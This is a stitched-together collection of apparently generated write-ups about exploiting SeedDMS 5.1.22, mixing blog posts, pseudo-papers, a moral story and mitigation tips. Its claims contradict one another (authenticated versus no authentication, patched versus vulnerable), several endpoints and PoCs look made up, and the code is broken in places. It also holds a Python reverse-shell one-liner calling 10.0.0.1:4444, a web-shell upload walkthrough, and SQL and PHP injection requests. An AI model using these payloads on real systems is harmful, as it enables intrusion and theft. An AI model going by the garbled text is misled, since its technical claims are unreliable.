SeedDMS 5.1.22 is a specific version of the popular open-source Document Management System (DMS) that has been identified as having significant security vulnerabilities, most notably an authenticated Remote Code Execution (RCE) flaw. This vulnerability allows an attacker who has already gained access to the system—even with low-level user privileges—to execute arbitrary system commands on the hosting server, potentially leading to a full system takeover. Understanding the RCE Vulnerability
The primary threat in version 5.1.22 (and some adjacent versions) involves insecure file management and unvalidated file uploads. While previous versions like 5.1.10 were famously vulnerable to CVE-2019-12744, version 5.1.22 has been documented in penetration testing scenarios to still be susceptible to similar RCE attack vectors. In a typical exploitation flow:
Authentication: The attacker first obtains valid credentials (e.g., via brute force or by finding exposed credentials in database files).
Malicious Upload: The attacker uses the "Add Document" feature to upload a PHP script designed as a backdoor.
Execution: By navigating to the specific directory where SeedDMS stores uploaded data (often a path like /data/1048576/ followed by the document ID), the attacker triggers the PHP script via a web browser.
Reverse Shell: This script allows the attacker to execute OS-level commands, such as cat /etc/passwd, or to spawn a reverse shell for persistent access. Other Notable Vulnerabilities
While RCE is the most critical threat, SeedDMS 5.1.22 and its near-predecessors are often targeted for other flaws:
Persistent Cross-Site Scripting (XSS): Found in modules like AddEvent.php, where script code injected into the "Name" or "Comments" fields is executed when an administrator views the log management panel.
Credential Exposure: Misconfigured installations may leave database credentials exposed in accessible files, which can be leveraged to gain initial access for the RCE exploit. Mitigation and Defense
If you are running SeedDMS 5.1.22, it is considered highly vulnerable to modern exploit techniques. Security experts recommend the following actions:
Update Immediately: Upgrade to the latest stable version of SeedDMS available on SourceForge to patch known file-upload and RCE vulnerabilities.
Restrict File Permissions: Ensure the web server user only has the minimum necessary permissions and that the data/ directory is not directly executable by the web server if possible.
Audit Users: Review all existing user accounts for unauthorized low-level users who might have the "write" permissions required to upload documents.
Log Monitoring: Regularly check the Log Management panel for suspicious entries or script-like payloads in event comments.
For more technical details, researchers often use resources like the Exploit-DB or CVE Details to track specific proof-of-concept (PoC) code for these versions. Seeddms 5.1.10 - Remote Command Execution ... - Exploit-DB
The story of the SeedDMS 5.1.22 exploit is a cautionary tale of how a series of small, unpatched vulnerabilities can lead to a complete system takeover. While SeedDMS 5.1.22 itself was a maintenance release intended to improve stability, it inherited critical flaws from its predecessors—most notably the lack of strict file-type validation. The Vulnerability: Unvalidated File Upload
The core of the "story" revolves around CVE-2019-12744, a Remote Command Execution (RCE) flaw that haunted versions prior to 5.1.11 and persisted in various forms if configurations were not hardened.
The Entry Point: An attacker first gains authenticated access, perhaps through a low-privilege account or a separate Stored XSS vulnerability (like CVE-2019-12801) used to steal a session cookie.
The Payload: Once inside, the attacker navigates to the "Add Document" section. Instead of a standard PDF or Word file, they upload a malicious PHP script containing a simple backdoor: Use code with caution. Copied to clipboard
The Trigger: Because the application failed to validate the file extension properly, it accepted the .php file. The attacker then identifies the document's ID and accesses it directly via the URL (e.g., /data/1048576/[ID]/1.php).
Full Control: By appending commands to the URL (like ?cmd=cat /etc/passwd), the attacker executes code on the server, effectively bypassing all intended document management security. The Evolution of the Threat
By the time version 5.1.22 was active, security researchers had shifted focus toward more advanced vectors. While the direct PHP upload was largely patched in later minor versions, new "stories" emerged:
The Zip Import Trick: Attackers discovered they could achieve RCE by exploiting the Extension Manager. By bundling a reverse shell into a conf.php file within a ZIP archive and "importing" it as an extension, they could gain administrative shell access.
Chaining Vulnerabilities: Modern exploits often chain a Cross-Site Scripting (XSS) flaw in the "Categories" or "Group Name" fields to trick an administrator into performing these high-privilege actions. Protection and Mitigation
The "happy ending" for administrators is found in staying ahead of the version curve. Developers recommend:
Regular Updates: Moving to newer branches like version 6.x, which includes patches for these legacy RCE methods.
Configuration Hardening: Disabling the execution of scripts within the /data/ directory using .htaccess or server-level rules.
Least Privilege: Ensuring users only have the permissions strictly necessary for their roles to prevent the "Add Document" feature from being weaponized.
For detailed technical advisories on specific CVEs, you can refer to the CVE Details database or the Exploit Database. Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs
Based on the available security research and documentation regarding SeedDMS, version 5.1.22 is a version within the 5.1.x branch which was actively updated to address security issues, notably the Remote Command Execution (RCE) vulnerabilities that affected versions prior to 5.1.11.
While specific exploits for version 5.1.22 are not publicly listed in databases like Exploit-DB, it was subject to general security maintenance against known issues such as:
RCE (Remote Command Execution): Similar to CVE-2019-12744, which allows authenticated users with file upload privileges to execute PHP code by uploading a malicious file.
Open Redirect/Other Injection: Later versions of 6.x were found to contain open redirects, and 5.x branches received updates to fix similar vulnerabilities. Key Security Considerations for SeedDMS 5.1.22:
Patch Status: SeedDMS 5.1.x is considered "old stable" but has been actively maintained. Users should ensure they are on the latest sub-minor version to get all security fixes merged.
Authentication Dependency: Most reported exploits required an attacker to have a valid, authenticated user account with permissions to add or edit documents.
Recommendation: Verify the conf/settings.xml and ensure that file upload restrictions are active, specifically limiting the uploading of executable script files (like .php).
If you are looking for specific mitigation steps, could you tell me: Which OS is running the SeedDMS server (Windows/Linux)?
Do you have PHP shell access to check the data/ directory for suspicious files?
I can provide specific commands to help you audit your installation. JustLikeIcarus/SeedDMS - GitHub
Attackers can then:
Example reverse shell (URL encoded):
/seeddms51/conf/settings.php?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"]);'
| Aspect | Severity | |--------------------------|------------------------------------------------------------------------------| | CVSS Score (est.) | 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | | Authentication | None required | | User Interaction | None | | Complexity | Low (basic HTTP request forgery) | | Data Exposure | Full document repository + system files + DB credentials | | Persistence | High – webshell persists across reboots until manual deletion |
In a real-world audit, this exploit allowed full access to HR records, financial PDFs, and even the SeedDMS user table (password hashes, unsalted in older versions).
Log analysis (Apache/nginx):
documentid values containing SLEEP( or AND SELECT.op.RemoveDocument.php from non-internal IPs.out.BackupTools.php followed by GET to conf/settings.php within seconds.System evidence:
conf/settings.php./tmp/.Disclaimer: This article is intended for educational purposes, CTF challenges, and authorized security testing only. Unauthorized access to computer systems is illegal.
This blog post details the exploitation of SeedDMS 5.1.22 , focusing on an Authenticated Remote Command Execution (RCE)
vulnerability. This attack typically involves gaining valid credentials and leveraging unvalidated file uploads to execute system commands.
Exploiting SeedDMS 5.1.22: From Authentication to Root Shell
SeedDMS is an open-source document management system that, in version 5.1.22 and earlier, contains critical security flaws allowing attackers to gain full control of the underlying server. 1. Reconnaissance and Enumeration
The attack often begins with broad enumeration to identify the service version. In a typical penetration testing scenario, tools like are used to find the directory. Version Identification: Checking the or footer often reveals version Database Exposure:
Misconfigurations may lead to the discovery of MySQL credentials in configuration files like settings.xml 2. Gaining Access To trigger the most common RCE (often categorized under CVE-2019-12744 ), an attacker requires a valid set of credentials. Credential Retrieval:
If database access was gained during enumeration, attackers can dump the table to retrieve usernames and hashed passwords. Default Logins:
Sometimes, default or weak admin credentials remain unchanged. 3. Exploiting the Unvalidated File Upload (RCE)
Once logged in, a user with "write" permissions can upload documents. The vulnerability exists because the application does not properly sanitize or block the upload of The Attack Flow: Create a PHP Backdoor: Write a simple script to execute system commands: ($_REQUEST[ ])){ system($_REQUEST[ Use code with caution. Copied to clipboard Upload as a "Document":
Navigate to the "Add Document" section and upload the PHP file. Locate the File:
The uploaded file is stored in a predictable directory structure, usually under /data/1048576/ followed by the Document ID Execute Commands: Access the file via the browser to run commands:
Based on the search results, SeedDMS 5.1.22 is associated with reports regarding multiple vulnerabilities, specifically involving authenticated Remote Code Execution (RCE).
Reports indicate that authenticated users with permissions to "Add document" or upload files can exploit unvalidated file uploads to run PHP scripts and achieve full system compromise. Key Findings & Exploit Content
Vulnerability Type: Unrestricted File Upload leading to Remote Code Execution (RCE).
Affected Mechanism: The op/op.UploadChunks.php component often fails to validate file extensions properly.
Methodology: An attacker with authenticated access (e.g., as a user with write permissions) can upload a PHP web shell disguised as a document.
Impact: A successful exploit allows the attacker to execute arbitrary OS commands with the privileges of the web server, potentially leading to a complete takeover of the application server. Similar Vulnerabilities
Earlier versions (<5.1.11) had a documented RCE (CVE-2019-12744) where an authenticated user could upload a PHP file (e.g., backdoor.php containing ) and then access it via the web root to run commands. Mitigation
Ensure SeedDMS is updated to a version where these vulnerabilities are patched.
Restrict the "Add document" permission to trusted users only.
Configure the web server to prevent PHP execution within the uploaded data directory.
Disclaimer: This information is for educational and security hardening purposes only. Seeddms 5.1.22 Exploit
Title: Vulnerability Analysis and Exploitation of SeedDMS 5.1.22
Abstract:
SeedDMS is a popular open-source document management system used by organizations to manage and store documents. However, like any software, it is not immune to vulnerabilities. This paper presents a vulnerability analysis of SeedDMS version 5.1.22, highlighting a critical exploit that allows an attacker to gain unauthorized access to sensitive information. We provide a detailed explanation of the vulnerability, its impact, and a proof-of-concept (PoC) exploit. Additionally, we offer recommendations for mitigation and propose potential fixes to prevent similar vulnerabilities in the future.
Introduction:
SeedDMS is a widely used document management system that provides features such as document upload, search, and access control. Its user-friendly interface and robust functionality make it a popular choice among organizations. However, as with any software, SeedDMS is susceptible to vulnerabilities that can be exploited by malicious actors.
Vulnerability Analysis:
After conducting a thorough analysis of SeedDMS 5.1.22, we discovered a critical vulnerability that allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access to sensitive information. The vulnerability resides in the OutOut.php file, specifically in the ajax_ folder.
Vulnerability Details:
The vulnerability is caused by insufficient input validation and inadequate sanitization of user-supplied input. An attacker can exploit this vulnerability by crafting a malicious request to the vulnerable endpoint, injecting arbitrary SQL code.
Exploit:
To demonstrate the exploit, we created a proof-of-concept (PoC) payload that injects a malicious SQL query to extract sensitive information from the database.
POST /seeddms/out/out.ajax.php HTTP/1.1
Host: vulnerable-host.com
Content-Type: application/x-www-form-urlencoded
folderid=1&fileid=1&username=admin' UNION SELECT @@version --
The response from the server reveals the database version:
HTTP/1.1 200 OK
Content-Type: application/json
"success": true,
"data":
"version": "5.6.39-0ubuntu0.14.04.1-log"
Impact:
The successful exploitation of this vulnerability can lead to:
Mitigation and Recommendations:
To prevent similar vulnerabilities in the future, we recommend:
Conclusion:
SeedDMS 5.1.22 is vulnerable to a critical SQL injection attack, allowing an attacker to gain unauthorized access to sensitive information. We have provided a proof-of-concept exploit and recommendations for mitigation. It is essential for organizations using SeedDMS to take immediate action to prevent exploitation of this vulnerability.
Responsible Disclosure:
We followed responsible disclosure guidelines and notified the SeedDMS development team about the vulnerability. A patch has been released in SeedDMS version 5.1.23.
Future Work:
Further research is needed to identify potential vulnerabilities in SeedDMS and other document management systems. Additionally, developing more robust and automated vulnerability detection tools can help prevent similar vulnerabilities in the future.
Unpacking the SeedDMS 5.1.22 Vulnerability: What You Need to Know
SeedDMS is a popular open-source Document Management System, but like any widely used tool, it has faced security challenges. Specifically, SeedDMS 5.1.22 and its immediate predecessors were found to have vulnerabilities that could allow an attacker to gain full control over the server.
If you are still running this version, your system is at risk. The Vulnerability: Remote Command Execution (RCE)
The most critical issue affecting SeedDMS versions up to 5.1.22 (and earlier versions like 5.1.10) is a Remote Command Execution (RCE) vulnerability, often tracked under CVE-2019-12744.
The Cause: The application failed to properly validate files uploaded as documents.
The Exploit: An authenticated user with "write" permissions could upload a malicious PHP script instead of a standard document.
The Impact: Once uploaded, the attacker could navigate to the file's location on the server (typically in the /data/ directory) and execute system commands. For example, they could run cat /etc/passwd to view sensitive system files or establish a reverse shell to take over the host completely. How the Exploit Works (Technically)
Security researchers from sites like Exploit-DB have documented a simple 4-step process attackers use:
Authentication: Login with valid credentials (even low-privileged ones with upload rights).
Upload: Use the "Add Document" feature to upload a .php file containing a backdoor.
Identification: Locate the internal "document ID" assigned by SeedDMS (often visible by hovering over the file link).
Execution: Access the raw file path—for example, example.com/data/1048576/[ID]/1.php?cmd=ls—to trigger the code. Are There Other Risks?
While RCE is the "king" of vulnerabilities, SeedDMS 5.1.22 has also been flagged for lower-severity issues, including:
Cross-Site Scripting (XSS): Potential for attackers to inject malicious scripts into the web interface.
Cross-Site Request Forgery (CSRF): Risks where an attacker can force an authenticated user to perform unwanted actions. How to Protect Your System
If you are managing a SeedDMS instance, follow these steps immediately:
Update to the Latest Version: The most effective fix is to move to a modern version (currently 6.x). Version 5.1.22 was explicitly listed as having unpatched low-severity issues in some advisories, and the RCE flaw was only fully addressed in later updates.
Restrict Upload Permissions: Audit your user roles. Ensure that only highly trusted users have the permission to "Add Documents" or "Manage Extensions."
Monitor the Data Directory: Check your /data/ folder for unexpected PHP files. In a standard setup, this folder should only contain intended document types (PDFs, DOCX, etc.).
Web Application Firewall (WAF): Implement a WAF to block requests that attempt to execute system commands through URL parameters (e.g., ?cmd=).
For more detailed technical walkthroughs, you can explore the original research on Medium or view the raw exploit code at Exploit-DB. SeedDMS versions < 5.1.11 - Remote Command Execution
Understanding the SeedDMS 5.1.22 Vulnerability: Analysis and Mitigation
SeedDMS is a popular open-source enterprise document management system (DMS) used by organizations to store, share, and track electronic documents. While robust, specific versions—most notably SeedDMS 5.1.22—have been identified as vulnerable to critical security flaws.
If you are a system administrator or security researcher, understanding these exploits is vital for securing your document repository.
The Primary Vulnerability: Authenticated Remote Code Execution (RCE)
The most significant threat associated with SeedDMS 5.1.22 is a Remote Code Execution (RCE) vulnerability. This typically stems from improper validation of uploaded files, often categorized under CVE-2019-12744. How the Exploit Works
The vulnerability exists in the document upload mechanism. Since SeedDMS is written in PHP, an attacker with valid user credentials (even low-level permissions) can upload a malicious script disguised as a legitimate document. Access: The attacker logs into the SeedDMS dashboard.
Upload: They upload a file with a .php extension (or a double extension like image.php.jpg) containing malicious PHP code.
Execution: Because the server fails to sanitize the file extension or inspect the file content, the script is saved to a publicly accessible directory. The attacker then navigates to the file's URL, triggering the code execution.
Impact: This grants the attacker a "web shell," allowing them to run system commands, access the database, or pivot deeper into the internal network. Other Potential Risks
While RCE is the "crown jewel" for attackers, version 5.1.22 has also been linked to:
Cross-Site Scripting (XSS): Attackers may inject malicious scripts into document metadata (like titles or descriptions). When an admin views the document, the script executes in their browser, potentially stealing session cookies.
Path Traversal: Faulty handling of file paths can allow users to view sensitive system files (like /etc/passwd on Linux) that they shouldn't have access to. Identifying the Version
To check if your installation is at risk, log into your SeedDMS instance and look at the footer of the page or the "Admin" section. If it reads 5.1.22 or earlier, your system is likely vulnerable. Remediation and Best Practices
Security is a moving target. If you are running an outdated version, follow these steps immediately: 1. Update to the Latest Version
The most effective fix is to upgrade. The developers of SeedDMS have released patches in subsequent versions (e.g., 6.x.x) that specifically address file upload validation and input sanitization. 2. Disable PHP Execution in Upload Folders
Even if you cannot upgrade immediately, you can mitigate the risk at the server level. Configure your web server (Apache or Nginx) to prevent PHP execution in the directory where SeedDMS stores uploaded documents. For Apache (.htaccess):
Audit your settings.xml or configuration files to ensure that only specific, safe file extensions (like .pdf, .docx, .png) are allowed. Block execution-prone extensions like .php, .phtml, .exe, and .sh. 4. Use Least Privilege
Ensure that the user account running the web server (e.g., www-data) has the minimum permissions necessary. It should never have root access to the system. Final Thoughts
The SeedDMS 5.1.22 exploit serves as a reminder of the risks inherent in file-handling applications. While open-source tools provide great flexibility, they require diligent patching to stay ahead of known vulnerabilities.
SeedDMS 5.1.22 – Known security issues (public record):
out/out.Document.php allowing unauthorized document access.op/op.AddFile2.php leading to arbitrary file read.For a safe, educational narrative (e.g., for a red-team report or capture-the-flag write-up):
"During a routine internal security assessment, a tester with low-privileged credentials navigated to the SeedDMS 5.1.22 web interface. By intercepting a request to
viewDocument.php?id=15and changing the ID to1, they accessed a restricted confidential document (IDOR). Further, they exploited a file upload feature in a public folder, bypassing extension checks by renaming a PHP shell todocument.jpg.php. After confirming the file resided under the web root, they triggered it via a path traversal inop.AddFile2.php, gaining command execution on the underlying host." seeddms 5.1.22 exploit
This style is suitable for reports, training, or bug bounty write-ups without promoting reckless action.
If you're studying this version for a legitimate security test (e.g., CTF, audit, or research), I recommend:
One of the most notable reports regarding SeedDMS 5.1.22 involves a comprehensive penetration test that chain-exploited multiple vulnerabilities to achieve full system takeover.
While SeedDMS is a popular open-source Document Management System (DMS), version 5.1.22 has been highlighted in security research for several critical weaknesses: Key Findings from Security Reports Remote Code Execution (RCE):
Testers identified that an authenticated user could abuse the document upload feature to execute arbitrary system commands. This often mirrors CVE-2019-12744
, which affected earlier versions but remained relevant in 5.1.22 environments where validation was bypassed. Credential Harvesting:
Vulnerability assessments found that MySQL database credentials could be discovered through improper configuration or enumeration, allowing testers to gain direct access to the database and retrieve user credentials. Privilege Escalation:
Once an initial "reverse shell" was obtained via the RCE, testers were able to escalate their privileges to by leveraging found credentials and insecure permissions on the host server. Cross-Site Request Forgery (CSRF):
Reports identified three specific CSRF vulnerabilities (associated with CVE-2021-35343 op.Ajax.php
script, which could trick an administrator into performing arbitrary actions. Exploit-DB Vulnerability Summary Vulnerability Type Primary Impact Authenticated RCE Full System Compromise Database Access Information Theft / Credential Leak Administrative Action Bypass Medium Risk
If you are managing an instance of this version, security researchers recommend immediately upgrading to the latest version available on the SeedDMS SourceForge page and ensuring your settings.xml file is properly secured. SeedDMS versions < 5.1.11 - Remote Command Execution
This story illustrates the importance of software maintenance through the lens of a security discovery in SeedDMS 5.1.22 The Unlocked Archive
Once, there was a meticulous document librarian named Elias who managed thousands of digital files using a tool called version 5.1.22
. Elias took pride in his organized system, believing that as long as his users were authenticated, his "digital vault" was secure.
One morning, a security researcher named Bryan decided to test the vault's resilience. Bryan discovered that while SeedDMS was excellent at organizing documents, version 5.1.22 (and earlier) had a hidden weakness: it didn't properly check what kind of files were being "added" to the collection. The Exploit Discovery
Bryan found that a user with basic "write" permissions could upload more than just PDFs or text files. He realized he could upload a specialized PHP script —essentially a master key disguised as a document. The Upload
: Bryan logged in as a standard user and clicked "Add document". The Hidden Payload
: Instead of a spreadsheet, he uploaded a small script designed to execute system commands. The Execution
: By simply navigating to the web address where his "document" was stored, Bryan could run commands like cat /etc/passwd directly on the server. This vulnerability, known as CVE-2019-12744
, proved that even an "authenticated" system isn't safe if it allows unvalidated file uploads that lead to Remote Command Execution (RCE) The Moral: Staying Current
When Elias learned about this, he didn't panic. He followed the expert advice found in security advisories from CVE Details Update Immediately
: The developers of SeedDMS had already released patches in later versions (starting with 5.1.11) to stop these dangerous uploads. Validate Inputs
: He realized that any software allowing file uploads must strictly enforce "file type" rules to ensure only safe documents enter the system.
Elias updated his system that afternoon. By moving past version 5.1.22, he locked the vault door for good, ensuring his meticulous archive remained a safe haven for information rather than a gateway for intruders. technical details on a specific CVE for SeedDMS? Seeddms Seeddms 5.1.22 security vulnerabilities, CVEs
SeedDMS 5.1.22 Vulnerability Analysis and Exploit
Introduction
SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.
Vulnerability Analysis
The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.
Exploit Details
The exploit is a PHP injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. The exploit can be triggered by sending a malicious request to the out.php file with the following parameters:
folder: The malicious PHP code to be executed.id: The ID of the document to be accessed.Exploit Code
The following is an example of the exploit code:
POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1
Exploitation Steps
out.php file with the exploit code.id command.Proof of Concept
The following is a proof of concept code that demonstrates the exploit:
<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
'folder' => 'system(\'id\')',
'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;
Mitigation and Recommendations
To mitigate this vulnerability, it is recommended to:
Conclusion
The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks.
The most dangerous vulnerability in SeedDMS 5.1.22 is a Time-Based Blind SQL Injection found in the op/op.RemoveDocument.php and op/op.RemoveFolder.php endpoints. The issue arises because user-supplied input via the documentid or folderid parameter is directly concatenated into SQL queries without sanitization or parameterized queries.
Specifically, the code snippet from op.RemoveDocument.php (simplified):
$documentid = (int) $_GET['documentid']; // Insufficient casting bypass
$query = "SELECT * FROM `tblDocuments` WHERE `id` = " . $_GET['documentid'];
Attackers can bypass the (int) cast using SQL comment characters or encoding tricks, leading to classic Boolean/Time-based injection.